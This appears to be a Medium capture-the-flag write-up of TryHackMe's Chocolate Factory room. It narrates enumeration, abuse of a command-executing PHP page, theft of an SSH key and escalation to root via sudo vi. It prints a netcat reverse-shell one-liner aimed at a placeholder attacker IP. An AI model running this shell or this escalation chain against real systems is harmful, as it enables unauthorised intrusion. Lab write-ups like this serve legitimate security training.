TryHackMe write-up: Chocolate Factory

Introduction

This is my write-up for TryHackMe’s Chocolate Factory Room

Enumeration

Using nmap, I found that this box had several ports open.

Checking the webpage, I found what looked like a login page.

Running nmap’s service enumeration option, I saw something interesting for port 113.

It turns out that a file named key_rev_key is being hosted in the web site. Downloading it using ghidra, I was able to read the code and find the key being asked.

Running dirb, I found a php page.

From my browser, I checked the php page. It looked like it is used to execute commands!

Exploitation

I sent the command “ls -lhtra” to see if this page would run simple commands.

I then tried sending the following command:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [Attacker IP] [Attacker port] >/tmp/f

I then checked my netcat listener, and found a connection from the target.

Checking the contents of the directory, I found another php file containing a possible set of credentials.

Trying to run su or ssh as this user proved futile. It seems that I needed to escalate privileges another way.

Privilege Escalation

Checking out charlie’s home directory showed what looked like an ssh private key.

Downloading the private key, I was able connect to the target via ssh as charlie.

Checking for sudo privileges, I found that the user charlie can execute vi as root. GTFOBins has a lot of examples showing how to root using vi.

Running root.py and then entering the key found in enumeration phase shows the root flag.

--

--

--

I like breaking stuff.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

20 Hours, $18, and 11 Million Passwords Cracked

Process of Multi-Native Token Domain NFT Auction on BigBang Mainnet

Triple IDOs Launchpad Sales — 16th September 21!

Backups for cloud storage? Y/N?

How to Connect Yi IoT Camera to WiFi

Yi IoT camera

{UPDATE} 龍之力量 Hack Free Resources Generator

📝 WHITELIST — IDO BIZVERSE CAMPAIGN OFFICIALLY CLOSED

The Biggest Malware Threats of 2019

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
m0ndzon3

m0ndzon3

I like breaking stuff.

More from Medium

TryHackMe - Kenobi Walkthrough

Tryhackme | Nmap

Network Services (FTP) — Tryhackme

TryHackMe Osquery Walk-Through